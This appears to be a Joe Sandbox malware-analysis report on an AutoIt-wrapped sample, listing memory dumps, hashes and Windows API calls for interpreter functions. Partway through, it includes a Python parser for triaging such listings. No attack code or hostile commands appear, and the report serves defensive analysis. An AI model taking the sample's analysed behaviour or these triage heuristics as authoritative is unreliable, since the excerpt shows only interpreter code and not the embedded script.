                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction ID: 7c53e7d84620efacc99831b3eeec94a9b2dec7ebed615360bb6e8e29e747c91d
                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction Fuzzy Hash: 30C1E5722051930EDF2D463AC47443EFAA15AA27B931A277DD4BBEB4E1EF24C524D720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction ID: 084b987ee5b408b2f7abf7dda5ee82c5b3d45dbf8f6fe79325ded2c26f5a32a0
                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction Fuzzy Hash: F6C1E2722090930ADF2D5639C47043EFAA15AA2BB931A277DD4BFEB4D5EF24C524D720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction ID: 9b783af5a0fa929eb30b3a0d8f72d3eabc9e5f9e55c7a58cf9a348b8bbd9bc70
                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction Fuzzy Hash: 4341C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction ID: 358a6ab1ecee919570902a24e2e394d2e4bbec1b80761394f00d61c10594e38b
                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction Fuzzy Hash: 95019279A00109EFCB44DF98C5909AEF7B6FB48710F60859DD809E7305D730AE42DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction ID: 433d707ee97ed5dcd5aef8d6e33f06162ef326eff12e7a777997401370f9fcb9
                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction Fuzzy Hash: 4C018078A00109EFCB48DF98C5909AEF7F6FF48710B60859DD809A7305D730AE41DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00ECA2FE
                                                                        • DeleteObject.GDI32(00000000), ref: 00ECA310
                                                                        • DestroyWindow.USER32 ref: 00ECA31E
                                                                        • GetDesktopWindow.USER32 ref: 00ECA338
                                                                        • GetWindowRect.USER32(00000000), ref: 00ECA33F
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00ECA480
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00ECA490
                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA4D8
                                                                        • GetClientRect.USER32(00000000,?), ref: 00ECA4E4
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00ECA51E
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA540
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA553
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA55E
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00ECA567
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA576
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00ECA57F
                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA586
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00ECA591
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA5A3
                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EFD9BC,00000000), ref: 00ECA5B9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00ECA5C9
                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00ECA5EF
                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00ECA60E
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA630
                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA81D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 2211948467-2373415609
                                                                        • Opcode ID: 2b6ceefd50908c944a1cf43d8d8d80433c9c23715153717b2d9db6b70bbe8649
                                                                        • Instruction ID: ceb6d5075da4c74832846d028d58321bec4e518d962609fa7db7ea2e4cf213f0
                                                                        • Opcode Fuzzy Hash: 2b6ceefd50908c944a1cf43d8d8d80433c9c23715153717b2d9db6b70bbe8649
                                                                        • Instruction Fuzzy Hash: 85026C71900258EFDB14DFA9CD89EAE7BBAFF48314F048158F915AB2A1C7719D42CB60
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EDD2DB
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EDD30C
                                                                        • GetSysColor.USER32(0000000F), ref: 00EDD318
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00EDD332
                                                                        • SelectObject.GDI32(?,00000000), ref: 00EDD341
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD36C
                                                                        • GetSysColor.USER32(00000010), ref: 00EDD374
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00EDD37B
                                                                        • FrameRect.USER32(?,?,00000000), ref: 00EDD38A
                                                                        • DeleteObject.GDI32(00000000), ref: 00EDD391
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00EDD3DC
                                                                        • FillRect.USER32(?,?,00000000), ref: 00EDD40E
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDD439
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(00000012), ref: 00EDD5AE
                                                                          • Part of subcall function 00EDD575: SetTextColor.GDI32(?,?), ref: 00EDD5B2
                                                                          • Part of subcall function 00EDD575: GetSysColorBrush.USER32(0000000F), ref: 00EDD5C8
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(0000000F), ref: 00EDD5D3
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(00000011), ref: 00EDD5F0
                                                                          • Part of subcall function 00EDD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EDD5FE
                                                                          • Part of subcall function 00EDD575: SelectObject.GDI32(?,00000000), ref: 00EDD60F
                                                                          • Part of subcall function 00EDD575: SetBkColor.GDI32(?,00000000), ref: 00EDD618
                                                                          • Part of subcall function 00EDD575: SelectObject.GDI32(?,?), ref: 00EDD625
                                                                          • Part of subcall function 00EDD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD644
                                                                          • Part of subcall function 00EDD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EDD65B
                                                                          • Part of subcall function 00EDD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00EDD670
                                                                          • Part of subcall function 00EDD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EDD698
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 3521893082-0
                                                                        • Opcode ID: a54781b8addcfabb1e9fe8521e43ff16db32254550cebd3f0ff7562bb463880d
                                                                        • Instruction ID: 8d5d489c5d4653d041150e83f07635ee1a699c1d9c382585bc73220e8b4c1344
                                                                        • Opcode Fuzzy Hash: a54781b8addcfabb1e9fe8521e43ff16db32254550cebd3f0ff7562bb463880d
                                                                        • Instruction Fuzzy Hash: 47917D7100D305EFC7109F65DC08A6B7BAAFF89325F105A19F962A61A0C771D949CB52
                                                                        APIs
                                                                        • DestroyWindow.USER32 ref: 00E8B98B
                                                                        • DeleteObject.GDI32(00000000), ref: 00E8B9CD
                                                                        • DeleteObject.GDI32(00000000), ref: 00E8B9D8
                                                                        • DestroyIcon.USER32(00000000), ref: 00E8B9E3
                                                                        • DestroyWindow.USER32(00000000), ref: 00E8B9EE
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EED2AA
                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EED2E3
                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00EED711
                                                                          • Part of subcall function 00E8B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E8B759,?,00000000,?,?,?,?,00E8B72B,00000000,?), ref: 00E8BA58
                                                                        • SendMessageW.USER32 ref: 00EED758
                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EED76F
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EED785
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EED790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: 994c45229c152c5f480d599157c3736067221e338bff889660b7c59f5f9fab13
                                                                        • Instruction ID: b8395359f7c3c07b640040ff58a60f3ffbe78ddf62bcb18e846ad8bc0c41efbd
                                                                        • Opcode Fuzzy Hash: 994c45229c152c5f480d599157c3736067221e338bff889660b7c59f5f9fab13
                                                                        • Instruction Fuzzy Hash: 5E12AC30108245DFCB21DF26C884BA9BBE5FF89308F146569E999EB262C731EC45CB91
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBDBD6
                                                                        • GetDriveTypeW.KERNEL32(?,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDCC3
                                                                        • SetErrorMode.KERNEL32(00000000,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDE29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: 6c8a0522519f7eeb689994112d52bc6ef86f09ba0140f0a2f12ff7b4290d10ca
                                                                        • Instruction ID: 36560ca5cb3d80fe3fc64256f0cedd75b3c572d457a59fb9463e578742e65162
                                                                        • Opcode Fuzzy Hash: 6c8a0522519f7eeb689994112d52bc6ef86f09ba0140f0a2f12ff7b4290d10ca
                                                                        • Instruction Fuzzy Hash: EC51947024C712AB8610DF10DC818EBB7E1FB94709B207A29F4C7B7295EB64D945EB47
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 60c3ce7b0435103e14d1240d107efcf80103be0648b6a37b0648d94246da0f0c
                                                                        • Instruction ID: 5e126ed74a17a731ff808ef7d69c81d5d04a77298baf89a4d8f49b5a94ec0031
                                                                        • Opcode Fuzzy Hash: 60c3ce7b0435103e14d1240d107efcf80103be0648b6a37b0648d94246da0f0c
                                                                        • Instruction Fuzzy Hash: 8E81F97064021A6BDB25AEA5DC43FAF77ADAF14304F14A06DFA0D7A1C2EB60D941E291
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,00F0DC00), ref: 00ED6449
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 3964851224-45149045
                                                                        • Opcode ID: 1fbfd9a83fcce669ae2515ac4fb15a062bb5f25f88dd668f2562ddef395f49d2
                                                                        • Instruction ID: 8876d7fa813dc2ace5fd7ad10d2b6e0c0ab4be36fe3ef124f2f37910aa31f733
                                                                        • Opcode Fuzzy Hash: 1fbfd9a83fcce669ae2515ac4fb15a062bb5f25f88dd668f2562ddef395f49d2
                                                                        • Instruction Fuzzy Hash: D8C194306042558FCB04EF10C551AAEB7E5EF95348F10685AF89A7B3A7DB20ED4BDB81
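The blocks above are the Joe Sandbox IDA plugin's per-function view of the AutoIt interpreter that wraps this sample: the `$AutoIt v3` window-class string, the `#include` / `#requireadmin` / `#OnAutoItStartRegister` directive parser, the DriveGetType() type names and the ControlCommand() verbs are all interpreter code, not the embedded script. When triaging a report of this size it helps to parse the listing and set such functions aside. The following Python parser is an added example and is not Joe Sandbox's code nor part of this report: it turns each `APIs` block into a record, rebases the `ref:` call-site addresses against the `Offset:` from the Source File line, splits the `$`-joined String ID, and tags functions whose strings match AutoIt runtime features. The tag labels in `AUTOIT_RULES` are this example's own assumption, and the constructed sample input is built from two blocks copied from this listing plus one subcall line borrowed from the button-drawing block to exercise that path.

```python
"""Joe Sandbox per-function 'APIs'/'Similarity' block parser (added example,
not Joe Sandbox code; the AUTOIT_RULES labels are this example's own tags)."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set

BULLET = r"^\s*•?\s*"
API_RE = re.compile(
    BULLET + r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
STRINGS_RE = re.compile(BULLET + r"String ID:\s*(?P<ids>.*?)\s*$")
OPCODE_RE = re.compile(BULLET + r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")
BASE_RE = re.compile(r"Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]{8})")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # call-site VA at the dump's load address
    subcall_of: Optional[str] = None  # set for 'Part of subcall function X' lines


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    opcode_id: str = ""
    image_base: int = 0               # 'Offset:' from the Source File line

    def rvas(self) -> List[int]:
        # VA minus dump base: comparable across runs that load at another base
        return [c.ref - self.image_base for c in self.calls]

    def api_sequence(self, own_only: bool = True) -> List[str]:
        # call order as listed; folded-in callee calls dropped unless asked for
        return [c.api for c in self.calls if not (own_only and c.subcall_of)]

    def nonempty(self) -> bool:
        return bool(self.calls or self.strings or self.opcode_id)


def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for line in text.splitlines():
        if line.strip() == "APIs":            # header opening each function block
            if cur.nonempty():
                records.append(cur)
            cur = FunctionRecord()
            continue
        if m := API_RE.match(line):
            args = m.group("args").split(",") if m.group("args") else []
            cur.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     int(m.group("ref"), 16), m.group("sub")))
        elif m := BASE_RE.search(line):
            cur.image_base = int(m.group("base"), 16)
        elif m := STRINGS_RE.match(line):
            # '$' is the report's join separator; a leading '$' yields an empty
            # first piece, which is dropped. A string that itself contains '$'
            # cannot be told apart from the separator, so counts are approximate.
            cur.strings = [s for s in m.group("ids").split("$") if s]
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m.group("id")
    if cur.nonempty():                        # listing may be cut off mid-block
        records.append(cur)
    return records


# label -> predicate over the function's string set. The strings belong to the
# AutoIt interpreter (version/window-class string, script directives,
# DriveGetType() names, ControlCommand() verbs); the labels are an assumption
# of this example, not Joe Sandbox signatures.
AUTOIT_RULES: Dict[str, Callable[[Set[str]], bool]] = {
    "AutoIt runtime version string": lambda s: "AutoIt v3" in s,
    "AutoIt script directive parser": lambda s: {"#include-once", "#requireadmin"} <= s,
    "AutoIt DriveGetType() type names": lambda s: {"PhysicalDrive", "RAMDisk", "iSCSI"} <= s,
    "AutoIt ControlCommand() verbs": lambda s: {"SENDCOMMANDID", "SHOWDROPDOWN", "ISCHECKED"} <= s,
}


def classify(rec: FunctionRecord) -> List[str]:
    s = set(rec.strings)
    return [label for label, pred in AUTOIT_RULES.items() if pred(s)]


# Constructed input: two blocks copied from this report (GetDriveTypeW function,
# directive-parser function) trimmed to the lines read here, plus one subcall
# line from another block so the folded-callee path is exercised.
SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00EBDBD6
• GetDriveTypeW.KERNEL32(?,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDCC3
  • Part of subcall function 00EDD575: GetSysColor.USER32(00000012), ref: 00EDD5AE
• SetErrorMode.KERNEL32(00000000,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDE29
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• Opcode ID: 6c8a0522519f7eeb689994112d52bc6ef86f09ba0140f0a2f12ff7b4290d10ca
APIs
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• Opcode ID: 60c3ce7b0435103e14d1240d107efcf80103be0648b6a37b0648d94246da0f0c
"""

if __name__ == "__main__":
    for i, r in enumerate(parse_report(SAMPLE)):
        print(i, r.opcode_id[:12], r.api_sequence(), [hex(v) for v in r.rvas()],
              classify(r) or ["untagged"])
```

Functions that end up untagged and whose call sequences are not explained by the interpreter (process injection, credential-store access, network I/O) are the ones worth reading in full; the Opcode ID lets you look the block up again in another report of the same AutoIt build, and the RVAs let you match call sites even when the dump was taken at a different base.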
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 00EDD5AE
                                                                        • SetTextColor.GDI32(?,?), ref: 00EDD5B2
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EDD5C8
                                                                        • GetSysColor.USER32(0000000F), ref: 00EDD5D3
                                                                        • CreateSolidBrush.GDI32(?), ref: 00EDD5D8
                                                                        • GetSysColor.USER32(00000011), ref: 00EDD5F0
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EDD5FE
                                                                        • SelectObject.GDI32(?,00000000), ref: 00EDD60F
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00EDD618
                                                                        • SelectObject.GDI32(?,?), ref: 00EDD625
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD644
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EDD65B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EDD670
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EDD698
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EDD6BF
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00EDD6DD
                                                                        • DrawFocusRect.USER32(?,?), ref: 00EDD6E8
                                                                        • GetSysColor.USER32(00000011), ref: 00EDD6F6
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EDD6FE
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EDD712
